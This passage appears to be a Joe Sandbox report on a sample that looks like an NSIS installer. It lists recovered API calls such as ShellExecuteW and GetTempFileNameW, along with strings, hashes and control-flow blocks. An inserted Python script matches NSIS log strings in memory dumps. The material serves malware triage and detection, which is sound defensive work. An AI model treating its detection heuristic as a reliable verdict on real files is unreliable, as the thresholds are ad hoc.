                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                      • API String ID: 4283519449-527102705
                                                                                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Control-flow Graph
APIs
• lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
• lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
• lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
• SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
• SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427979,759223A0,00000000), ref: 00406902
Similarity
• API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
• String ID:
• API String ID: 2740478559-0
• Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
• Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
• Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
• Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Control-flow Graph
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GlobalFree.KERNELBASE(00781400), ref: 00402387
Similarity
• API ID: FreeGloballstrcpyn
• String ID: %ReadyAdvised%$Exch: stack < %d elements$Pop: stack empty
• API String ID: 1459762280-2750020891
• Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
• Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
• Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Control-flow Graph
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• GlobalFree.KERNELBASE(00781400), ref: 00402387
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0
• Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
• Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Control-flow Graph
APIs
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0
• Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
• Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Control-flow Graph
APIs
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
Similarity
• API ID: PrivateProfileStringWritelstrcpyn
• String ID: %ReadyAdvised%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
• API String ID: 247603264-3806224681
• Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
• Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
• Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Control-flow Graph
APIs
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
                                                                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                      • API String ID: 3156913733-2180253247
                                                                                                      • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                      • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                      • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                      • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                      Control-flow Graph (rendered graph not reproduced; its legend distinguishes Executed from Not Executed blocks; recovered blocks and edges follow)
                                                                                                      • 838: 405eab-405eb7; edge 838->839
                                                                                                      • 839: 405eb8-405eec, GetTickCount, GetTempFileNameW; edges 839->840, 839->841
                                                                                                      • 840: 405efb-405efd; edge 840->843
                                                                                                      • 841: 405eee-405ef0; edges 841->839, 841->842
                                                                                                      • 842: 405ef2; edge 842->843
                                                                                                      • 843: 405ef5-405ef8
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileNameTempTick
                                                                                                      • String ID: nsa
                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                      • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                      • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                      • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                      • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
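The two functions above (the ShellExecuteW wrapper with its "ExecShell:" log strings, and the GetTickCount/GetTempFileNameW routine with the "nsa" String ID) expose constants that survive in a memory dump and can be matched without executing anything. The following is an added example by the editor, not code from Joe Sandbox or from the analysed sample: it extracts ASCII and UTF-16LE strings from a raw dump, looks for the format strings listed in this report (ExecShell, RMDir, WriteINIStr, HideWindow) and for the NUL-terminated wide literal "nsa", and returns a summary. Reading these strings as NSIS installer-stub log output is the editor's inference, not a statement the report makes; the two-marker threshold in `triage` and the sample dump bytes are constructed for the example.

```python
import re

# Format strings recovered from this report's listing: the ExecShell pair at xrefs
# 00402211 / 00402226, the RMDir and WriteINIStr strings passed to the logging helper at
# 004062CF, and "HideWindow". Reading them as NSIS stub log lines is the editor's inference.
NSIS_LOG_MARKERS = (
    "ExecShell: success",
    "ExecShell: warning: error",
    "WriteINIStr: wrote",
    "RMDir: RemoveDirectory",
    "HideWindow",
)

# Prefix handed to GetTempFileNameW at 00405EE4 (String ID "nsa"). The compiler stores it as a
# NUL-terminated UTF-16LE literal, so we match that exact byte pattern rather than the bare
# text, which would also hit inside unrelated words such as "transaction".
TEMP_PREFIX_WIDE = "nsa".encode("utf-16le") + b"\x00\x00"

MIN_LEN = 6
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def extract_strings(blob: bytes):
    """Yield (offset, encoding, text) for printable ASCII and UTF-16LE runs in a raw dump.

    The listing calls the wide API family (lstrlenW, wvsprintfW), so these format strings sit
    in the dump as UTF-16LE; the ASCII pass covers narrow strings elsewhere in the image.
    """
    for m in ASCII_RUN.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in WIDE_RUN.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_log_markers(blob: bytes):
    """Return one hit per (offset, marker) where a recovered string contains a known marker."""
    hits = []
    for off, enc, text in extract_strings(blob):
        for marker in NSIS_LOG_MARKERS:
            if marker in text:
                hits.append({"offset": off, "encoding": enc, "marker": marker, "text": text})
    return hits


def has_temp_prefix(blob: bytes) -> bool:
    """True if the NUL-terminated wide literal L"nsa" is present in the dump."""
    return TEMP_PREFIX_WIDE in blob


def triage(blob: bytes) -> dict:
    """Summarise the evidence. Threshold (two distinct markers, or one marker plus the temp
    prefix) is a heuristic chosen for this example, not a vendor rule."""
    hits = find_log_markers(blob)
    markers = sorted({h["marker"] for h in hits})
    prefix = has_temp_prefix(blob)
    return {
        "markers": markers,
        "hits": hits,
        "temp_prefix": prefix,
        "looks_like_nsis_stub": len(markers) >= 2 or (len(markers) == 1 and prefix),
    }


# Constructed sample dump (not bytes from the analysed file): two wide log strings, the wide
# "nsa" literal, filler bytes and an unrelated narrow string.
SAMPLE_DUMP = (
    b"\x00" * 16
    + 'ExecShell: success ("%s": file:"%s" params:"%s")'.encode("utf-16le") + b"\x00\x00"
    + b"\x90" * 8
    + TEMP_PREFIX_WIDE
    + 'RMDir: RemoveDirectory("%s")'.encode("utf-16le") + b"\x00\x00"
    + b"unrelated narrow text\x00"
)

if __name__ == "__main__":
    result = triage(SAMPLE_DUMP)
    for h in result["hits"]:
        print(f'{h["offset"]:#08x} {h["encoding"]:8} {h["text"]}')
    print("temp prefix:", result["temp_prefix"], "| verdict:", result["looks_like_nsis_stub"])
```

Run it against the `.sdmp` files listed under Memory Dump Source (read the file as bytes and pass it to `triage`) to confirm the same strings the IDA plugin reported; the wide-string pass is what matters for this image, since every matched string in the listing is passed to a W-suffixed API.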
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                      • String ID: HideWindow
                                                                                                      • API String ID: 1249568736-780306582
                                                                                                      • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                      • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                      • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                      • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                      APIs
                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                      • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                      • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                      • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesCreate
                                                                                                      • String ID:
                                                                                                      • API String ID: 415043291-0
                                                                                                      • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                      • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                      • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                      • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                      • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                      • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                      • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                      • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                      • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                      • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                      • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                      • String ID:
                                                                                                      • API String ID: 4115351271-0
                                                                                                      • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                      • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                      • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                      • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
